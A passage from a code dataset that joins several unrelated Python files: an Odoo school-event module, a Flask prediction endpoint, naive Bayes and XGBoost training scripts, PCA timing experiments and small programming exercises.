fields.Selection([('intra', 'IntraSchool'),\n ('inter', 'InterSchool')],\n 'Event Type',\n help='Event is either IntraSchool\\\n or InterSchool')\n start_date = fields.Date('Start Date', help=\"Event Starting Date\")\n end_date = fields.Date('End Date', help=\"Event Ending Date\")\n start_reg_date = fields.Date('Start Registration Date',\n help=\"Event registration starting date\")\n last_reg_date = fields.Date('Last Registration Date',\n help=\"Last Date of registration\")\n contact_per_id = fields.Many2one('hr.employee', 'Contact Person',\n help=\"Event contact person\")\n supervisor_id = fields.Many2one('hr.employee', 'Supervisor',\n help=\"Event Supervisor Name\")\n parameter_id = fields.Many2one('school.event.parameter', 'Parameter',\n help=\"Parameters of the Event\\\n like (Goal, Point)\")\n maximum_participants = fields.Integer('Maximum Participants',\n help='Maximum Participant\\\n of the Event')\n participants = fields.Integer(compute='_compute_participants',\n string='Participants', readonly=True)\n part_standard_ids = fields.Many2many('school.standard',\n 'school_standard_event_rel',\n 'standard_id', 'event_id',\n 'Participant Standards',\n help=\"The Participant is from\\\n which standard\")\n state = fields.Selection([('draft', 'Draft'), ('open', 'Running'),\n ('close', 'Close'), ('cancel', 'Cancel')],\n string='State', readonly=True, default='draft')\n part_ids = fields.Many2many('school.event.participant',\n 'event_participants_rel', 'participant_id',\n 'event_id', 'Participants', readonly=True,\n order_by='score')\n code = fields.Many2one('school.school', 'Organizer School',\n help='Event Organized School')\n is_holiday = fields.Boolean('Is 
Holiday(s)',\n help='Checked if the event is organized\\\n on holiday.')\n color = fields.Integer('Color Index', default=0)\n\n @api.constrains('start_date', 'end_date')\n def _check_dates(self):\n\n sedt = self.start_date > self.end_date\n if (self.start_date and self.end_date and sedt):\n raise UserError(_('Error! Event start-date must be lower\\\n then Event end-date.'))\n\n @api.constrains('start_date', 'end_date', 'start_reg_date',\n 'last_reg_date')\n def _check_all_dates(self):\n\n dt = self.start_reg_date and self.last_reg_date\n if (self.start_date and self.end_date and dt):\n\n if self.start_reg_date > self.last_reg_date:\n raise UserError(_('Error! Event Registration StartDate must be\\\n lower than Event Registration end-date.'))\n elif self.last_reg_date >= self.start_date:\n raise UserError(_('Error! Event Registration last-date must be\\\n lower than Event start-date.'))\n\n @api.model\n def search(self, args, offset=0, limit=None, order=None, count=False):\n\n if self._context.get('part_name_id'):\n student_obj = self.env['student.student']\n data = student_obj.browse(self._context.get('part_name_id'))\n arg_domain = ('part_standard_ids', 'in', [data.standard_id.id])\n args.append(arg_domain)\n return super(SchoolEvent, self).search(args, offset, limit, order,\n count=count)\n\n @api.multi\n def event_open(self):\n if self.part_ids and self.part_ids[0].id:\n self.write({'state': 'open'})\n else:\n raise UserError(_('No Participants ! \\\n No Participants to open the Event.'))\n\n @api.multi\n def event_close(self):\n self.state = 'close'\n return True\n\n @api.multi\n def event_draft(self):\n self.state = 'draft'\n return True\n\n @api.multi\n def event_cancel(self):\n self.state = 'cancel'\n return True\n\n\nclass SchoolEventRegistration(models.Model):\n '''for registration by students for events'''\n _name = 'school.event.registration'\n _description = 'Event Registration'\n\n name = fields.Many2one('school.event', 'Event Name',\n domain=[('state', '=', 'draft')], required=True)\n part_name_id = fields.Many2one('student.student', 'Participant Name',\n required=True)\n reg_date = fields.Date('Registration Date', readonly=True,\n default=lambda *a:\n time.strftime(\"%Y-%m-%d %H:%M:%S\"))\n state = fields.Selection([('draft', 'Draft'),\n ('confirm', 'Confirm'),\n ('cancel', 'Cancel')], 'State', readonly=True,\n default='draft')\n is_holiday = fields.Boolean('Is Holiday(s)', help='Checked if the event is\\\n organized on holiday.')\n\n @api.multi\n def regi_cancel(self):\n event_obj = self.env['school.event']\n student_obj = self.env['student.student']\n event_part_obj = self.env['school.event.participant']\n self.write({'state': 'cancel'})\n\n for reg_data in self:\n event_data = event_obj.browse(reg_data.name.id)\n prt_data = student_obj.browse(reg_data.part_name_id.id)\n # delete entry of participant\n domain = [('stu_pid', '=', prt_data.pid),\n ('event_id', '=', reg_data.name.id),\n ('name', '=', reg_data.part_name_id.id)]\n stu_prt_data = event_part_obj.search(domain)\n stu_prt_data.unlink()\n # remove entry of event from student\n list1 = []\n\n for part in prt_data.event_ids:\n part = student_obj.browse(part.id)\n list1.append(part.id)\n flag = True\n\n for part in list1:\n data = event_part_obj.browse(part)\n if data.event_id.id == reg_data.name.id:\n flag = False\n\n if not flag:\n list1.remove(part)\n stu_part_id = student_obj.browse(reg_data.part_name_id.id)\n stu_part_id.write({'event_ids': [(6, 0, list1)]})\n list1 = []\n # remove entry of participant from 
event\n flag = True\n\n for par in event_data.part_ids:\n part = event_part_obj.browse(par.id)\n list1.append(part.id)\n\n for par in list1:\n data = event_part_obj.browse(par)\n\n if data.name.id == reg_data.part_name_id.id:\n parii = par\n flag = False\n\n if not flag:\n list1.remove(parii)\n participants = int(event_data.participants) - 1\n event_reg_id = event_obj.browse(reg_data.name.id)\n event_reg_id.write({'part_ids': [(6, 0, list1)],\n 'participants': participants})\n return True\n\n @api.multi\n def regi_confirm(self):\n self.write({'state': 'confirm'})\n event_obj = self.env['school.event']\n student_obj = self.env['student.student']\n event_part_obj = self.env['school.event.participant']\n\n for reg_data in self:\n event_data = event_obj.browse(reg_data.name.id)\n prt_data = student_obj.browse(reg_data.part_name_id.id)\n participants = int(event_data.participants) + 1\n\n # check participation is full or not.\n if participants > event_data.maximum_participants:\n raise UserError(_('Error ! \\\n Participation in this Event is Full.'))\n\n # check last registration date is over or not\n if reg_data.reg_date > event_data.last_reg_date:\n raise UserError(_('Error ! Last Registration date is over \\\n for this Event.'))\n # make entry in participant\n val = {'stu_pid': str(prt_data.pid),\n 'score': 0,\n 'win_parameter_id': event_data.parameter_id.id,\n 'event_id': reg_data.name.id,\n 'name': reg_data.part_name_id.id}\n temp = event_part_obj.create(val)\n # make entry of event in student\n list1 = []\n\n for evt in prt_data.event_ids:\n part = student_obj.browse(evt.id)\n list1.append(part.id)\n flag = True\n\n for evt in list1:\n data = event_part_obj.browse(evt)\n if data.event_id.id == reg_data.name.id:\n flag = False\n\n if flag:\n list1.append(temp.id)\n stu_part_id = student_obj.browse(reg_data.part_name_id.id)\n stu_part_id.write({'event_ids': [(6, 0, list1)]})\n # make entry of participant in event\n list1 = []\n flag = True\n\n for evt in event_data.part_ids:\n part = event_part_obj.browse(evt.id)\n list1.append(part.id)\n\n for evt in list1:\n data = event_part_obj.browse(evt)\n if data.name.id == reg_data.part_name_id.id:\n flag = False\n\n if flag:\n list1.append(temp.id)\n evnt_reg_id = event_obj.browse(reg_data.name.id)\n evnt_reg_id.write({'part_ids': [(6, 0, list1)]})\n return True\n\n\nclass StudentStudent(models.Model):\n _name = 'student.student'\n _inherit = 'student.student'\n _description = 'Student Information'\n\n event_ids = fields.Many2many('school.event.participant',\n 'event_participant_student_rel', 'event_id',\n 'stu_id', 'Events', readonly=True)\n\n @api.model\n def search(self, args, offset=0, limit=None, order=None, count=False):\n if self._context.get('name'):\n event_obj = self.env['school.event']\n event_data = event_obj.browse(self._context['name'])\n std_ids = [std_id.id for std_id in event_data.part_standard_ids]\n args.append(('standard_id', 'in', std_ids))\n return super(StudentStudent, self).search(args, offset, limit, order,\n count=count)\n","sub_path":"school_event/models/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":13186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
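The regi_confirm and regi_cancel methods above rewrite many2many links with (6, 0, list1) triples. For reference, a sketch of the standard Odoo x2many write commands those triples belong to; the student and participant records in the last line are hypothetical:

# (0, 0, values)   create a record and link it
# (1, id, values)  update a linked record
# (2, id)          delete the record
# (3, id)          unlink it (the record survives)
# (4, id)          link an existing record
# (5, 0, 0)        unlink all
# (6, 0, ids)      replace all links with the given id list
student.write({'event_ids': [(4, participant.id)]})  # append one link instead of rebuilding the list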
+{"seq_id":"311362874","text":"from flask import Flask, jsonify, abort, request, make_response, url_for, render_template\nfrom flask_cors import CORS, cross_origin\nimport numpy as np\nimport pickle\n\n\napp = Flask(__name__, static_url_path = \"/static\")\ncors = CORS(app)\n\n@app.errorhandler(400)\ndef not_found(error):\n return make_response(jsonify( { 'error': 'Bad request' } ), 400)\n\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(jsonify( { 'error': 'Not found' } ), 404)\n\n\n# main route\n# render index.html\n@app.route('/', methods = ['GET'])\ndef index():\n return render_template('index.html')\n\n# endpoint to predict the probability\n# we restore our tensorflow model in model folder\n# and use that to make a prediction\n@app.route('/api/v1.0/bayes', methods = ['POST'])\ndef predict():\n \n \n X_predict = np.float32([[request.form['umur'], request.form['pekerjaan'], request.form['penghasilan'], request.form['jml_ang_kel'], request.form['status_rumah']]])\n\n \n ################################\n # Load pickle\n ################################\n\n gnb = pickle.load( open( \"bayes.p\", \"rb\" ))\n\n predict = gnb.predict(X_predict)\n\n\n response = {\n 'endpoint': 'api/v1.0/bayes',\n 'method': 'POST',\n 'umur': request.form['umur'],\n 'pekerjaan': request.form['pekerjaan'],\n 'penghasilan': request.form['penghasilan'],\n 'jumlah': request.form['jml_ang_kel'],\n 'status_rumah': request.form['status_rumah'],\n 'status':int(predict)\n }\n\n return jsonify( { 'response': response } )\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug = True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"148786907","text":"#!/usr/bin/env python\r\n#coding: utf-8\r\nimport gzip\r\nimport json\r\nimport re # 正規表現\r\nfilename = \"jawiki-country.json.gz\"\r\n\r\ndef extract_UK():\r\n # イギリスの本文を戻り値として取得\r\n\r\n # rtは読み込み専用&テキストモード(いずれもデフォルト)\r\n with gzip.open(filename, \"rt\", encoding = \"utf-8\") as data_file:\r\n for line in data_file:\r\n data_json = json.loads(line)# jsonのデータをロードしてpythonのデータ型に変換\r\n if data_json[\"title\"] == \"イギリス\":# タイトルが「イギリス」の時\r\n return data_json[\"text\"]# 本文を戻り値として返す\r\n\r\n raise ValueError(\"Not Found Article About UK\")\r\n # タイトルがイギリスでないとき例外処理としてValueErrorを出す\r\n\r\n\r\n# 正規表現のコンパイル、あらかじめ使う正規表現を書き込んでおく\r\npattern = re.compile(r'''\r\n ^ # 行頭\r\n (={2,}) # キャプチャ対象、2個以上の'='\r\n \\s* # 余計な0個以上の空白(”哲学”や”婚姻”の前後に余分な空白があるため除去)\r\n (.+?) # 余分な0個以上の空白\r\n \\1 # 後方参照、1番目のキャプチャ対象と同じ内容\r\n .* # 任意の文字が0文字以上\r\n $ # 行末\r\n ''', re.MULTILINE + re.VERBOSE)\r\n # MULTILINEは読み込みが複数行あるため、VERBOSEは正規表現中にコメントするため\r\n\r\n# 抽出\r\nresult = pattern.findall(extract_UK())#findallはマッチした部分だけを持ってくる\r\n\r\n# 結果表示\r\nfor line in result:\r\n level = len(line[0]) - 1 #\"=\"の数 - 1\r\n print(\"{indent}{sect}({level})\".format( #format関数を使用\r\n indent = \"\\t\" * (level -1), sect = line[1], level = level))\r\n","sub_path":"test23.py","file_name":"test23.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"59096281","text":"import collections\nimport math\nimport functools\nimport operator\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndef main():\n label_column = 'label'\n raw_data = pd.read_csv('./data/spam.csv', encoding='latin-1')\n\n processed_data = raw_data[['v1', 'v2']]\n processed_data = processed_data.rename(columns={'v1': label_column, 'v2': 'text'})\n processed_data[label_column] = processed_data.label.map({'ham': 0, 'spam': 1})\n processed_data['text'] = processed_data['text'].apply(process_text)\n\n vocabulary = get_vocabulary(processed_data['text'].str.cat(sep=' '))\n processed_data['feature_list'] = processed_data['text'].apply(lambda s: [vocabulary[word] for word in s.split()])\n processed_data['empty'] = processed_data['feature_list'].apply(lambda fs: not fs)\n processed_data = processed_data[processed_data['empty'] == False]\n\n ham, spam = processed_data[processed_data[label_column] == 0]['feature_list'], processed_data[processed_data[label_column] == 1]['feature_list']\n ham_probs, spam_probs = get_probabilities(ham, spam, vocabulary)\n\n processed_data['prediction'] = processed_data['feature_list'].apply(lambda fs: predict(fs, ham_probs, spam_probs, ham, spam, vocabulary))\n processed_data['correct'] = np.where(processed_data[label_column] == processed_data['prediction'], 1, 0)\n\n accuracy = processed_data['correct'].mean()\n print(f'Accuracy: {accuracy}')\n\ndef predict(fs, neg_probabilities, pos_probabilities, negatives, positives, vocabulary):\n neg_wordcount = sum(len(fs) for fs in negatives)\n neg_prob = functools.reduce(operator.mul, (neg_probabilities[f] if f in neg_probabilities else (1 / (neg_wordcount + len(vocabulary))) for f in fs))\n pos_wordcount = sum(len(fs) for fs in positives)\n pos_prob = functools.reduce(operator.mul, (pos_probabilities[f] if f in pos_probabilities else (1 / (pos_wordcount + len(vocabulary))) for f in fs))\n\n return 0 if neg_prob > pos_prob else 1\n\ndef get_probabilities(negatives, positives, vocabulary):\n neg_wordcount = sum(len(fs) for fs in negatives)\n neg_probabilities = {k: (v + 1) / (neg_wordcount + len(vocabulary)) for k, v in functools.reduce(operator.add, (collections.Counter(fs) for fs in negatives)).items()}\n \n pos_wordcount = sum(len(fs) for fs in positives)\n pos_probabilities = {k: (v + 1) / (pos_wordcount + len(vocabulary)) for k, v in functools.reduce(operator.add, (collections.Counter(fs) for fs in positives)).items()}\n\n return neg_probabilities, pos_probabilities\n\ndef get_vocabulary(s):\n return {word: i + 1 for i, word in enumerate(set(s.split()))}\n\ndef process_text(text, remove_chars=['.', ',', '!', '?', '\\'', '(', ')', '\"', ':', '-', '/', '\\\\', '$', '=', '>', '<', '&', '#', ';', '÷', '£', '+', '*']):\n text = text.lower()\n text = ''.join(c for c in text if c not in remove_chars and not c.isdigit())\n text = ' '.join(word.strip() for word in text.split())\n\n return text\n\ndef process_string(s, remove_chars=[]):\n return replace_chars(s.lower(), remove_chars).strip()\n\ndef replace_chars(s, remove_chars, replace_char=' '):\n return ''.join(replace_char if c in remove_chars else c for c in s.lower().strip())\n\nif __name__ == \"__main__\":\n main()","sub_path":"naive_bayes.py","file_name":"naive_bayes.py","file_ext":"py","file_size_in_byte":3246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"598890521","text":"# Compare the tim to train IncrementalPCA, RandomizedPCA, and PCA\n# Support for python 2 and 3\nfrom __future__ import unicode_literals, division, print_function\n\n# Common Imports\nimport numpy as np\nimport time\nimport os\n\n# ML Imports\nfrom sklearn.decomposition import PCA, IncrementalPCA\nfrom sklearn.datasets import fetch_mldata\nfrom sklearn.model_selection import train_test_split\n\n# Graph Imports\nimport matplotlib.pyplot as plt\nplt.rcParams['axes.labelsize'] = 14\nplt.rcParams['xtick.labelsize'] = 12\nplt.rcParams['ytick.labelsize'] = 12\n\n# Config\nPROJECT_ROOT_DIR = \".\"\n\n\n# Declare Function\ndef image_path(fig_id):\n if not os.path.exists('images'):\n os.makedirs('images')\n return os.path.join(PROJECT_ROOT_DIR, 'images', fig_id)\n\n\ndef save_fig(fig_id, tight_layout=True):\n print(\"Saving\", fig_id)\n if tight_layout:\n plt.tight_layout()\n plt.savefig(image_path(fig_id) + \".png\", format=\"png\", dpi=300)\n\n\n# Get Data\nmnist = fetch_mldata('MNIST original')\n\nX = mnist[\"data\"]\ny = mnist[\"target\"]\n\nX_train, X_test, y_train, y_test = train_test_split(X, y)\n\n# Train comparing with various components\nfor n_components in (2, 10, 154):\n print(\"n_components =\", n_components)\n regular_pca = PCA(n_components=n_components)\n inc_pca = IncrementalPCA(n_components=n_components, batch_size=500)\n rnd_pca = PCA(\n n_components=n_components, random_state=42, svd_solver=\"randomized\")\n\n for pca in (regular_pca, inc_pca, rnd_pca):\n t1 = time.time()\n pca.fit(X_train)\n t2 = time.time()\n print(\" {}: {:.1f} seconds\".format(pca.__class__.__name__, t2 - t1))\n\n# Train with datasets of various sizes\ntimes_rpca = []\ntimes_pca = []\nsizes = [\n 1000, 10000, 20000, 30000, 40000, 50000, 70000, 100000, 200000, 500000\n]\nfor n_samples in sizes:\n X = np.random.randn(n_samples, 5)\n pca = PCA(n_components=2, svd_solver=\"randomized\", random_state=42)\n t1 = time.time()\n pca.fit(X)\n t2 = time.time()\n times_rpca.append(t2 - t1)\n pca = PCA(n_components=2)\n t1 = time.time()\n pca.fit(X)\n t2 = time.time()\n times_pca.append(t2 - t1)\n\nplt.plot(sizes, times_rpca, \"b-o\", label=\"RPCA\")\nplt.plot(sizes, times_pca, \"r-s\", label=\"PCA\")\nplt.xlabel(\"n_samples\")\nplt.ylabel(\"Training time\")\nplt.legend(loc=\"upper left\")\nplt.title(\"PCA and Randomized PCA time complexity\")\n\nsave_fig(\"pca_and_randomized_pca_time_complexity\")\nplt.show()\n\n# Compared performance with dataset of 20000 instances\ntimes_rpca = []\ntimes_pca = []\nsizes = [1000, 2000, 3000, 4000, 5000, 6000]\nfor n_features in sizes:\n X = np.random.randn(2000, n_features)\n pca = PCA(n_components=2, random_state=42, svd_solver=\"randomized\")\n t1 = time.time()\n pca.fit(X)\n t2 = time.time()\n times_rpca.append(t2 - t1)\n pca = PCA(n_components=2)\n t1 = time.time()\n pca.fit(X)\n t2 = time.time()\n times_pca.append(t2 - t1)\n\nplt.plot(sizes, times_rpca, \"b-o\", label=\"RPCA\")\nplt.plot(sizes, times_pca, \"r-s\", label=\"PCA\")\nplt.xlabel(\"n_features\")\nplt.ylabel(\"Training time\")\nplt.legend(loc=\"upper left\")\nplt.title(\"PCA and Randomized PCA time complexity\")\n","sub_path":"dimensionality_reduction/examples/time_complexity.py","file_name":"time_complexity.py","file_ext":"py","file_size_in_byte":3121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"514640627","text":"final = {}\nrelationships = {}\n\ndef findParent(name, gene):\n\tif name in final.keys():\n\t\treturn (name, final[name])\n\telse:\n\t\tparent1 = ''\n\t\tparent2 = ''\n\t\tfor key, value in relationships.items():\n\t\t\tif value == name and parent1 == '':\n\t\t\t\tparent1 = key\n\t\t\telif value == name and key != parent1:\n\t\t\t\tparent2 = key\n\t\t\t\tnewName1,gene1 = findParent(parent1, '')\n\t\t\t\tnewName2,gene2 = findParent(parent2, '')\n\t\t\t\tif (gene1 == \"dominant\" and gene2 == \"dominant\") or (gene1 == \"dominant\" and gene2 == \"recessive\") or (gene1 == \"recessive\" and gene2 == \"dominant\"):\n\t\t\t\t\tfinal[name] = \"dominant\"\n\t\t\t\t\treturn (name, \"dominant\")\n\t\t\t\telif gene1 == \"dominant\" or gene2 == \"dominant\" or (gene1 == \"recessive\" and gene2 == \"recessive\"):\n\t\t\t\t\tfinal[name] = \"recessive\"\n\t\t\t\t\treturn (name, \"recessive\")\n\t\t\t\telse:\n\t\t\t\t\tfinal[name] = \"non-existent\"\n\t\t\t\t\treturn (name, \"non-existent\")\n\t\t\telse: \n\t\t\t\tcontinue\n\t\treturn (name,\"non-existent\")\n\n\n\n\nnumLines = int(input().strip())\n\nfor i in range(numLines):\n\tstr1, str2 = input().strip().split()\n\tif str2 == \"dominant\" or str2 == \"recessive\" or str2 == \"non-existent\":\n\t\tfinal[str1] = str2\n\telse:\n\t\trelationships[str1] = str2\nfor key, value in relationships.items():\n\tif value in final.keys():\n\t\tcontinue\n\telse:\n\t\tdiscard = findParent(value, '')\nfor key, value in sorted(final.items()):\n\tprint(key+' '+value)","sub_path":"genes.py","file_name":"genes.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"628259793","text":"'''\nGiven a number n (user input), Write a Python program to determine if n is a prime.\n'''\n\ndef prime(number: int) -> bool:\n '''\n Assume not prime until proven\n '''\n prime= False\n for i in range(2,10):\n # Check for numbers < 10 \n prime_singles = [1,2,3,5,7]\n if number in prime_singles:\n prime=True\n break\n # Check for numbers > 10 \n if number % i == 0: \n prime= False\n break\n else:\n prime=True\n return prime\n\n# Print if prime or not prime\nprint('Python program to determine if n is a prime.')\nnumber= int(input('Enter a number: $ '))\nif prime(number):\n print('number: ', number, 'is prime')\nelse: \n print('number: ', number, 'is not prime')","sub_path":"homework/random_problems/10exercise.py","file_name":"10exercise.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"148099494","text":"import sys\nimport pickle\nimport logging\nimport datetime\n\nfrom os import path\nimport pandas as pd\nimport numpy as np\nimport xgboost as xgb\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import r2_score\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\n\n# Log time-level and message for getting a running estimate\nlogging.basicConfig(stream=sys.stdout, format='%(asctime)s - %(levelname)s - %(message)s', level=logging.INFO)\n\n# This will only use the Label Encoder as on using the one hot encoding \n# we have to guarantee all the values in that one-hot-column has to present \n# in the test dataset also otherwise it will result in the feature mismatch bug\n\n# TODO To resolve this we need put the columns in same order and intialize the old columns \n# We will do this in later in this we are training a simple XGB Model for the seven days data\n\n# Batch size of 100000\nCHUNKSIZE = 10000\nCONSTANT_FILLER = 'unknown_flag'\n\ndef saveModel(xg_reg, learning_rate_val, max_depth_val):\n\tfilename = '/data/models/XGB_MODEL_{}_{}_{}.sav'\n\tfilename = filename.format(learning_rate_val, max_depth_val, int(datetime.datetime.now().timestamp())) \n\tpickle.dump(xg_reg, open(filename, 'wb'))\n\n\tlogging.info(\"training complete and model is saved\")\n\n# Load the Labels Vocabulary in One Hot Encoder\ndef loadCategorialList(base_folder, columnNm):\n\tmap_file = base_folder + columnNm + \"_map.dict\"\n\tif not path.exists(map_file):\n\t\traise RuntimeError(\"Map file missing for \"+ columnNm + \" name\")\n\n\tcolumn_dict_file = open(map_file, \"rb\")\n\tcolumn_dict = pickle.load(column_dict_file)\n\tcolumn_series = pd.Series(column_dict)\n\treturn list(column_series.index)\n\ndef trainModel(learning_rate_val, max_depth_val, base_folder, earlyBreak):\n\t\t\n\tlearning_params = {\n\t\t'objective' : 'reg:squarederror',\n\t\t'colsample_bytree' : 0.3,\n\t\t'learning_rate' : learning_rate_val, \n 'max_depth' : max_depth_val,\n 'alpha' : 5,\n 'n_estimators' : 10\n\t}\n\txg_reg = None\n\n\t#Load the categorical columns for faster filling in between\n\tcategoricalCols = [ 'slot_names', 'container_type', 'component_name', 'component_namespace', 'site']\n\tcategoryLists = []\n\tfor col in categoricalCols:\n\t\tcategoryLists.append(loadCategorialList(base_folder, col))\n\n\tone_hot_encoder = OneHotEncoder(categories=categoryLists, handle_unknown='ignore', sparse=False)\t\n\n\tchunkcount = 1\n\ttraining_data_file = base_folder + '3HourDataFullFile.csv'\n\tfor chunk in pd.read_csv(training_data_file, chunksize=CHUNKSIZE):\n\t\tlogging.info(\"Start chunk Processing - \" + str(chunkcount))\n\t\tlogging.info(chunk.columns)\n\t\t\n\t\tYColumns = ['impressions']\n\t\tnumericCols = ['guarantee_percentage', 'days_interval', 'hours_interval']\n\t\tcolumns_to_keep = YColumns + categoricalCols + numericCols \n\t\tdf_merged_set = chunk[columns_to_keep]\t\n\t\t\n\t\tnLength = len(numericCols)\n\t\tcLength = len(categoricalCols)\n\t\tX1, X2, Y = df_merged_set.iloc[:,1:cLength+1], df_merged_set.iloc[:,cLength+1:cLength+nLength+1], df_merged_set.iloc[:,0]\n\t\t\n\t\tone_hot_encoder.fit(X1)\n\t\tone_hot_encoded = one_hot_encoder.transform(X1)\n\n\t\t# Drop the ctegorical columns \t\n\t\tdataMatrix = xgb.DMatrix(np.concatenate((X2, 
one_hot_encoded), axis=1), label=Y.to_numpy())\n\t\tif(chunkcount==1):\n\t\t\txg_reg = xgb.train(learning_params, dataMatrix, 10)\n\t\telse:\n\t\t\t# Takes in the intially model and produces a better one\n\t\t\txg_reg = xgb.train(learning_params, dataMatrix, 10, xgb_model=xg_reg)\n\t\tlogging.info(\"Model saved \"+str(xg_reg))\n\t\tif(earlyBreak=='1' and chunkcount>10):\n\t\t\tbreak\n\t\tchunkcount = chunkcount + 1 \n\tlogging.info(xg_reg)\n\tsaveModel(xg_reg, learning_rate_val, max_depth_val)\n\tpredict(xg_reg, one_hot_encoder, base_folder, earlyBreak)\n\ndef predict(xg_reg, one_hot_encoder, base_folder, earlyBreak):\n\ttraining_data_file = base_folder + '3HourDataFullFile.csv'\n\n\tchunkcount = 1\n\tcategoricalCols = [ 'slot_names', 'container_type', 'component_name', 'component_namespace', 'site']\n\tfor chunk in pd.read_csv(training_data_file, chunksize=CHUNKSIZE):\n\t\tYColumns = ['impressions']\n\t\tnumericCols = ['guarantee_percentage', 'days_interval', 'hours_interval']\n\t\tcategoricalCols = [ 'slot_names', 'container_type', 'component_name', 'component_namespace', 'site']\n\n\t\tcolumns_to_keep = YColumns + categoricalCols + numericCols \n\t\tdf_merged_set = chunk[columns_to_keep]\t\n\t\t\n\t\tnLength = len(numericCols)\n\t\tcLength = len(categoricalCols)\n\t\tX1, X2, Y = df_merged_set.iloc[:,1:cLength+1], df_merged_set.iloc[:,cLength+1:cLength+nLength+1], df_merged_set.iloc[:,0]\n\t\t\n\t\tone_hot_encoder.fit(X1)\n\t\tone_hot_encoded = one_hot_encoder.transform(X1)\n\n\t\tdataMatrix = xgb.DMatrix(np.concatenate((X2, one_hot_encoded), axis=1), label=Y.to_numpy())\n\t\tpredictions = xg_reg.predict(dataMatrix)\n\n\t\tdf = pd.DataFrame({'actual': Y, 'predictions': predictions})\n\t\taccuracy = r2_score(Y.to_numpy(), predictions)\n\t\tlogging.info(\"Accuracy(Max:1 , 0 for stright line) : \" + str(accuracy))\n\t\tlogging.info(str(df.head()))\n\t\t\n\t\tif(earlyBreak=='1' and chunkcount>10):\n\t\t\tbreak\n\t\tchunkcount = chunkcount + 1 \t\n\tlogging.info(\"Prediction Over\")\n\ndef __main__():\n\t# count the arguments\n\tif len(sys.argv) < 4:\n\t\traise RuntimeError(\"Please provode the learning_rate, max_depth, base folder and earlyBreak\")\n\ttrainModel(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])\n\n#This is required to call the main function\nif __name__ == \"__main__\":\n\t__main__()","sub_path":"LinearModels/XGB_model_single_file.py","file_name":"XGB_model_single_file.py","file_ext":"py","file_size_in_byte":5561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
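The chunk loop above relies on xgboost's booster continuation: passing the previous model via the xgb_model argument makes train() add boosting rounds instead of starting over. A minimal self-contained sketch of that pattern on synthetic data:

import numpy as np
import xgboost as xgb

params = {'objective': 'reg:squarederror', 'max_depth': 4}
booster = None
for _ in range(3):  # stands in for the CSV chunks
    X = np.random.rand(1000, 5)
    y = X.sum(axis=1)
    dtrain = xgb.DMatrix(X, label=y)
    # passing the previous booster continues training instead of restarting
    booster = xgb.train(params, dtrain, num_boost_round=10, xgb_model=booster)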
+{"seq_id":"385033177","text":"'''\n#n = int(input())\nn = ['b : a c d', 'd : f a b d', 'b : y', 'y : b']\nq = ['a b', 'a f', 'd b', 'b d']\n['A', 'B : A', 'C : A', 'D : B C']\n['A B', 'B D', 'C D', 'D A']\nmd = dict()\nvisited = []\nallclases = set()\n\ndef getParrents(pclass):\n visited.append(pclass)\n findset = md.get(pclass)\n if findset is not None:\n for i in findset:\n if j not in visited:\n findset.update(getParrents(pclass))\n else:\n return set()\n return findset\n \n#for i in range(n):\nfor i in n: \n \n #ls = input().split()\n ls = i.replace(':', ' ').split()\n\n if len(ls) > 0:\n pClass = ls.pop(0)\n pSet = set(ls)\n pSet.add(pClass)\n allclases.update(pSet)\n checks = md.get(pClass)\n if checks is not None:\n pSet.update(checks)\n\n md[pClass] = pSet\n \nfor j in allclases:\n if j in md.keys():\n visited.clear()\n fPrs = getParrents(j)\n if fPrs is not None:\n md[j] = fPrs\n else:\n md[j] = set()\n\n#q = int(input())\n\nprint(md)\n\nqvery = list()\n\n#for j in range(q):\nfor j in q:\n qvery.append(j.split())\n\nfor ii in qvery:\n ii.reverse()\n lenii = len(ii)\n \n if len(ii) == 0:\n print('No')\n \n else:\n rez = md.get(ii[0])\n\n if rez is None:\n print('No')\n elif lenii < 2:\n print('Yes')\n else:\n if ii[1] in rez:\n print('Yes')\n else:\n print('No')\n '''\n############################################################\n\n\n#n = int(input())\nnn = ['A', 'B : A', 'C : A', 'D : B C']\nq = ['A B', 'B D', 'C D', 'D A']\n\nmd = dict()\nvisited = []\nallclases = set()\nqvery = list()\nmd2 = dict()\ntempset = set()\n\n#for i in range(n):\n#nn.append(input())\n\ndef getparset(chld):\n visited.append(chld)\n chi = md.get(chld)\n if chi is None:\n tempset.update(set([chld]))\n else:\n tempset.update(chi)\n for i in chi:\n if i not in visited:\n getparset(i)\n\nfor i in nn:\n\n if len(i) > 0:\n ls = i.replace(':', ' ').split()\n allclases.update(set(ls))\n prc = ls.pop(0)\n checkprc = md.get(prc)\n if checkprc is None:\n md[prc] = set(ls)\n else:\n md[prc].update(set(ls))\n\nfor i in allclases:\n visited.clear()\n tempset.clear()\n getparset(i)\n md2[i] = tempset.copy()\n\n\n#for j in range(q):\nfor j in q:\n qvery.append(j.split())\n\nfor ii in qvery:\n\n if len(ii) < 2:\n print('Yes')\n elif ii[0] == ii[1]:\n print('Yes')\n else:\n getmd2 = md2.get(ii[1])\n if getmd2 is not None:\n if ii[0] in getmd2:\n print('Yes')\n else:\n 